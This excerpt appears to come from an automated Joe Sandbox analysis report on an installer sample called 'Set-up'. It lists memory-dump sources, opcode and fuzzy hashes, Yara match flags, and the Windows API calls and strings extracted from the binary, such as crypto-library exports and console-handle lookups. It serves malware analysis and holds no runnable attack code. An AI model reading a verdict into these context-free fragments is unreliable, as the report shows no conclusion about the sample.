                                                                                                                                  • Instruction Fuzzy Hash: 4881AF76A087428BE3258A18D89032BB7B3BFE361CF19865DDC9ACB251E771DC15C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a353d2f910b8de00f5834b9bc65e200f88f02d0ecee4f63660ff0c85c2ed7a01
                                                                                                                                  • Instruction ID: 9d4db53034551723431e201e761a64a1bf594e6f0a39405e6623a8385569f2e8
                                                                                                                                  • Opcode Fuzzy Hash: a353d2f910b8de00f5834b9bc65e200f88f02d0ecee4f63660ff0c85c2ed7a01
                                                                                                                                  • Instruction Fuzzy Hash: 3A81F57250878A87D725CA18C4407FBBBA3FFE1218F5A86AFD86A8B345E775D805C341
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c20ca1a237661b2289d816e32526fd21ee6d97586e2c2fd57ff1ba7446c94b7a
                                                                                                                                  • Instruction ID: b37a96b13c392424b27d655c13a735842cab381c94dd438085dddd3c36a96836
                                                                                                                                  • Opcode Fuzzy Hash: c20ca1a237661b2289d816e32526fd21ee6d97586e2c2fd57ff1ba7446c94b7a
                                                                                                                                  • Instruction Fuzzy Hash: 1D51E133B196219BC7188A3CDC8566EBBD7EBC4324F1D8A2DE896D7294DA34DC0187C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4cc0412a2100d3a7dc5512e27d610f5bcb7ff83f9bdea233be9a6168a83de167
                                                                                                                                  • Instruction ID: 581daf3e22166e02773204ebe1fc91b695195afb39bfaaa172293437727e0f39
                                                                                                                                  • Opcode Fuzzy Hash: 4cc0412a2100d3a7dc5512e27d610f5bcb7ff83f9bdea233be9a6168a83de167
                                                                                                                                  • Instruction Fuzzy Hash: 8C51052670EA854BD724C87C58223BA7F934BDA238F1C876AEBF2C73D1D9598C014311
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Instruction ID: 062e00185e3aa98a08c3b75aa20295b44bcd9724e75db6a43e53a8300d540082
                                                                                                                                  • Opcode Fuzzy Hash: 087f9580ca4db50fabd22b51360cb95339e9e582fa781ae807b7c5c874244213
                                                                                                                                  • Instruction Fuzzy Hash: 9831DB306086049BD714DE59C8809FBB7E3FF84318F95496EE89A9B341E731D953CB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ac834ddadc3519e1e9a06bbe19664fc72ceb21430761866696cc48b530125da8
                                                                                                                                  • Instruction ID: ca807ec9f874db16cb32059c8c4f66695574f9360386349c01b97d5d61e10cb6
                                                                                                                                  • Opcode Fuzzy Hash: ac834ddadc3519e1e9a06bbe19664fc72ceb21430761866696cc48b530125da8
                                                                                                                                  • Instruction Fuzzy Hash: 7221E1769183648AD7308F68C8413ABF7E1FF81310F195C2DD9D557250E7754645DB82
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 4d58462c98eadc63d90f5023e7a942ce70247f82f3c0f93ec7cb88ab9696cede
                                                                                                                                  • Instruction ID: 2d2d46b4b0a07eeae5b71bf0e46cb4250f0a9b8d984dd94663ccdd5b3bff3874
                                                                                                                                  • Opcode Fuzzy Hash: 4d58462c98eadc63d90f5023e7a942ce70247f82f3c0f93ec7cb88ab9696cede
                                                                                                                                  • Instruction Fuzzy Hash: 79115E32B4E6145FD3105D6CEC8066BBBA7FBC9620F2D4939E8C84B255D6318C818794
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fd84e81f5ebaa47c1bb605a75c1b0a9accc919319f513e1daf267c1e53770a5f
                                                                                                                                  • Instruction ID: 18ab919804b2b74aa18362f5063677874abb311ff6fbb529d96d9e4ac25047c1
                                                                                                                                  • Opcode Fuzzy Hash: fd84e81f5ebaa47c1bb605a75c1b0a9accc919319f513e1daf267c1e53770a5f
                                                                                                                                  • Instruction Fuzzy Hash: 6E31ACB0248359AFE320DF209849B6FBBE8EB86744F100D1CF6849B281D774D9058B96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2d8774d8b49409ddc71536b6f66f75e93ba90c3e56dc56e31eaac769bbad3209
                                                                                                                                  • Instruction ID: db19db37064375bf62df80c84ffcb2e4963fd55ffa3741838ec0009cd510ad7a
                                                                                                                                  • Opcode Fuzzy Hash: 2d8774d8b49409ddc71536b6f66f75e93ba90c3e56dc56e31eaac769bbad3209
                                                                                                                                  • Instruction Fuzzy Hash: 7201D271299640DFE7288A14D490B3FBBA7EB89200F282C1DE58213291C735EC458B95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8a58efd48ad9eb501542e796f597dd7beff04c9c101294cd842b6175ec86d680
                                                                                                                                  • Instruction ID: 56e1d0f16106318263be8ba1dda9fb2e0896f2bf398bcf973d6940ef978cb7e9
                                                                                                                                  • Opcode Fuzzy Hash: 8a58efd48ad9eb501542e796f597dd7beff04c9c101294cd842b6175ec86d680
                                                                                                                                  • Instruction Fuzzy Hash: 7F0171F1B007014BEB209E54D4D8B3BB2ADAF95604F19593CD81997282DB76EC05C6D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc573e91eae7927d5c6402807b30cc6889312ed58a0c693ca89364110eed8da6
                                                                                                                                  • Instruction ID: 0211731999b41ae2e0cd59fac082a5c81a717552d43e576896b9a017648d0c42
                                                                                                                                  • Opcode Fuzzy Hash: bc573e91eae7927d5c6402807b30cc6889312ed58a0c693ca89364110eed8da6
                                                                                                                                  • Instruction Fuzzy Hash: D3214F759F9218ABDA225F20FC0383C3FE2A3113047544025F82DAA639FF312959DF6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3408eeb8982a725a101de4aa323ede861e6816114b25f5b8bd022c873b518723
                                                                                                                                  • Instruction ID: 1b7545264a6f8216abd193ab9252f692a29f89de1c6b499282b99652909149b5
                                                                                                                                  • Opcode Fuzzy Hash: 3408eeb8982a725a101de4aa323ede861e6816114b25f5b8bd022c873b518723
                                                                                                                                  • Instruction Fuzzy Hash: 6511E6327315218BD718CF39C991AA1B7E1FB98314B184B79E83ACF2C6C730A615CB94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36f8c271c4280e21959b8cf430b7dd84c819ff4d5739f37ff2a537a593ab7dbb
                                                                                                                                  • Instruction ID: 3b81621d0876d59c50a7b3e01929cfa0ff8ed1134e81c2d9ea6f24b311fa45d0
                                                                                                                                  • Opcode Fuzzy Hash: 36f8c271c4280e21959b8cf430b7dd84c819ff4d5739f37ff2a537a593ab7dbb
                                                                                                                                  • Instruction Fuzzy Hash: 99017C7411C3508FCB289F14809163AB7F0FF56350FA52C5DE4C657281DA349882DF86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f2365e41b1d7819627c7ddc181f841b4794dfc39a3060f656a434c9c13e523b8
                                                                                                                                  • Instruction ID: 9c7df0870510b9ed9d331a34ed7ef9e11ff11b2115f381d7106817bddd923191
                                                                                                                                  • Opcode Fuzzy Hash: f2365e41b1d7819627c7ddc181f841b4794dfc39a3060f656a434c9c13e523b8
                                                                                                                                  • Instruction Fuzzy Hash: 4311802524E3C1DA8356C66D08C004FBF925EFA008F989E9DF5C42B387C1A0DA19C7AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e9e28d7e0a9ab1d332ac1cf9dd72c94cadf000b3a6096b0dc83e2b67c6eee77e
                                                                                                                                  • Instruction ID: 2048d5f74198f19a6622cb56513e16c211358734e96a5cf009a96d676bee1e04
                                                                                                                                  • Opcode Fuzzy Hash: e9e28d7e0a9ab1d332ac1cf9dd72c94cadf000b3a6096b0dc83e2b67c6eee77e
                                                                                                                                  • Instruction Fuzzy Hash: 96012D7B75C61D0BD710DC699C80966B3E2E7CA114F0C413CF955D3305E534EE074194
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                  • Instruction ID: bc1f1733eace2ddd0f017ac51a653b9297dbfa1380048e254bedd74e3f96e298
                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                  • Instruction Fuzzy Hash: 40019A78A12208DFCB54DF98C198AEEB7B6FB45310F208699D80557394C731AF45DF80
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000004,460C02D8,00000074,00000000,00000054), ref: 01068415
                                                                                                                                    • Part of subcall function 00E5DD10: GetLastError.KERNEL32(00000107,?,?,460C02D8,00000000,00000000,00000038), ref: 00E5DDDC
                                                                                                                                    • Part of subcall function 00E5DD10: GetLastError.KERNEL32(00000001), ref: 00E5DDEE
                                                                                                                                    • Part of subcall function 00E5DD10: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE1D
                                                                                                                                    • Part of subcall function 00E5E110: GetProcAddress.KERNEL32(?,?), ref: 00E5E140
                                                                                                                                    • Part of subcall function 00E5E110: GetLastError.KERNEL32(00000001,?), ref: 00E5E199
                                                                                                                                    • Part of subcall function 00E5E110: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E1BE
                                                                                                                                    • Part of subcall function 00E5E020: GetProcAddress.KERNEL32(?,?), ref: 00E5E061
                                                                                                                                    • Part of subcall function 00E5E020: GetLastError.KERNEL32 ref: 00E5E06E
                                                                                                                                    • Part of subcall function 00E5E020: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E0F1
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842C9
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842E1
                                                                                                                                    • Part of subcall function 00E84270: __CxxThrowException@8.LIBVCRUNTIME ref: 00E842F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ErrorLast$AddressProc$CriticalInitializeSection
                                                                                                                                  • String ID: CiDhAgree$CiDhAgreedSize$CiDhFree$CiDhInit$CiDhModulusBits$CiDhPubStore$CiDhPubStoredSize$CiEcdhAgree$CiEcdhAgreedSize$CiEcdhEnum$CiEcdhFree$CiEcdhInit$CiEcdhPubStore$CiEcdhPubStoredSize$CiFree$CiGenRandomBytes$CiHashDigest$CiHashDigestSize$CiHashFree$CiHashKeyedEnum$CiHashKeyedInit$CiHashUnkeyedEnum$CiHashUnkeyedInit$CiHashUpdate$CiInit$CiPkEnum$CiPkPrivAlgs$CiPkPrivFree$CiPkPrivGenerate$CiPkPrivInit$CiPkPrivKeyBits$CiPkPrivMitigateSigTiming$CiPkPrivSigSize$CiPkPrivSign$CiPkPrivStore$CiPkPrivStoredSize$CiPkPubAlgs$CiPkPubFree$CiPkPubFromPriv$CiPkPubInit$CiPkPubKeyBits$CiPkPubStore$CiPkPubStoredSize$CiPkPubVerify$CiSymEnum$CiSymFree$CiSymInfo$CiSymInit$CiSymMsgDecrypt$CiSymMsgEncrypt$CiSymMsgPeekLen$CiSymProcess$CiSymProcessInPlace
                                                                                                                                  • API String ID: 1031632368-4179614984
                                                                                                                                  • Opcode ID: acea69a679631ec3f582487ad4dff1b6b382ba317ecbd8cec6dbbcc0051cc682
                                                                                                                                  • Instruction ID: b42030af640e0a315d23bc96c9bc2b24507e6ea860b308ccdebd96379630e7d1
                                                                                                                                  • Opcode Fuzzy Hash: acea69a679631ec3f582487ad4dff1b6b382ba317ecbd8cec6dbbcc0051cc682
                                                                                                                                  • Instruction Fuzzy Hash: AEF1DC70A21A0AAFD34CDF31CA52BEAF7A4FF10701F41596DE81557A51EB706A28CBD0
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE18,00000001,00000000), ref: 00E4D9A9
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E4D9C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenConsoleW), ref: 00E4D9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateConsoleHandle), ref: 00E4D9E3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseConsoleHandle), ref: 00E4D9F4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InvalidateConsoleDIBits), ref: 00E4DA05
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyConsoleIoHandle), ref: 00E4DA16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E4DA27
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CompareStringOrdinal), ref: 00E4DA38
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE18,00000002), ref: 00E4DA4A
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,00E48C63,00000000,7FFFFFFE,460C02D8,460C02D8,00000000,460C02D8,00000000,00000000), ref: 00E4DA88
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: CloseConsoleHandle$CompareStringOrdinal$DuplicateConsoleHandle$GetProcessId$InvalidateConsoleDIBits$OpenConsoleW$VerifyConsoleIoHandle$kernel32.dll
                                                                                                                                  • API String ID: 925111853-1511978065
                                                                                                                                  • Opcode ID: 9275a95a30b2315367ab4bbb6fb058f8e9722943bf70d70b00f2840c5ecc032c
                                                                                                                                  • Instruction ID: 5c63e5a6dacc585486b3493d19d2527d198eb4e524107a8a05b7a9ead4588ccb
                                                                                                                                  • Opcode Fuzzy Hash: 9275a95a30b2315367ab4bbb6fb058f8e9722943bf70d70b00f2840c5ecc032c
                                                                                                                                  • Instruction Fuzzy Hash: 8D21C475681340EFD339CF25EC4AB6A7BB8FB49702F001569F821E2248C7B42964CBE4
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F0793C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: %d %d$%d:%d:%d$14:05:00$Apr$Aug$Aug 1 2024$Dec$Feb$GetRealBuildTimeStamp: mktime() returned -1$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                                                                                                  • API String ID: 2005118841-2800337880
                                                                                                                                  • Opcode ID: 82288e3f1d67d70a2fe6dbdf7906a44fcc2ef829d1ee7f17ed64542c547a9b59
                                                                                                                                  • Instruction ID: 026078257467c56eb840a40731e3c155115517c4dcf3d1d74f1b04c7d17731a5
                                                                                                                                  • Opcode Fuzzy Hash: 82288e3f1d67d70a2fe6dbdf7906a44fcc2ef829d1ee7f17ed64542c547a9b59
                                                                                                                                  • Instruction Fuzzy Hash: B051FBF1E95304EADF05EBA2ED06FDD72F8AB94B14F100069E818B61C4E7719A04EB95
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE18,00000001,00000000), ref: 00E4D9A9
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E4D9C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenConsoleW), ref: 00E4D9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateConsoleHandle), ref: 00E4D9E3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseConsoleHandle), ref: 00E4D9F4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InvalidateConsoleDIBits), ref: 00E4DA05
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyConsoleIoHandle), ref: 00E4DA16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E4DA27
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CompareStringOrdinal), ref: 00E4DA38
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE18,00000002), ref: 00E4DA4A
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,00E48C63,00000000,7FFFFFFE,460C02D8,460C02D8,00000000,460C02D8,00000000,00000000), ref: 00E4DA88
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: CloseConsoleHandle$CompareStringOrdinal$DuplicateConsoleHandle$GetProcessId$InvalidateConsoleDIBits$OpenConsoleW$VerifyConsoleIoHandle$kernel32.dll
                                                                                                                                  • API String ID: 925111853-1511978065
                                                                                                                                  • Opcode ID: 8d30d9f6fb682db236c65effcec1568c21f41936fdbe0be076bad49bbc85932e
                                                                                                                                  • Instruction ID: 4b3b34f5292b9519471bf062a55f8743c70019eb2bd6ef8ef4c66fddc00bd3cc
                                                                                                                                  • Opcode Fuzzy Hash: 8d30d9f6fb682db236c65effcec1568c21f41936fdbe0be076bad49bbc85932e
                                                                                                                                  • Instruction Fuzzy Hash: 1A11E9746C1340AFD738CF21A849A6D3BB4FB49702F0015A9F825E234CC7B42A60CBE9
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00E44D5D
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 00E44D6D
                                                                                                                                  • ResetEvent.KERNEL32 ref: 00E44D93
                                                                                                                                  • CreateProcessW.KERNEL32(0131AB88,?,00000000,00000000,00000000,00000008,00000000,00000000,?,?,?,00000000,00000040), ref: 00E44FA6
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000040), ref: 00E44FB4
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000040), ref: 00E44FC0
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000040), ref: 00E44FCA
                                                                                                                                  • SetEvent.KERNEL32(?,00000000,00000040), ref: 00E44FE3
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00000000,00000040), ref: 00E44FF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseEventHandleProcess$CreateCurrentReset
                                                                                                                                  • String ID: -as=0x$ -ep=0x$ -msg64=$ -pid=$ -tid=$=$BvDump -reason=$D
                                                                                                                                  • API String ID: 1887766995-2405390875
                                                                                                                                  • Opcode ID: 792768146afce5b9e73e4fe1df7805c9d90e1d4e0d0719fde72e3b90247d48d0
                                                                                                                                  • Instruction ID: 66de8fc0df99de46dff36d6375d3366a34a2c42f7fa01bb8a0413fd9d43650ab
                                                                                                                                  • Opcode Fuzzy Hash: 792768146afce5b9e73e4fe1df7805c9d90e1d4e0d0719fde72e3b90247d48d0
                                                                                                                                  • Instruction Fuzzy Hash: 7791BB716043419BD730DF28EC45BABB7E8FB98715F00492AFA99E72C4DB31A844CB91
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE55
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE6C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE83
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE9A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEB1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEC8
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEDF
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEF6
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF0D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF24
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF3B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF52
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF69
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF80
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF97
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FFAE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FFC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005118841-0
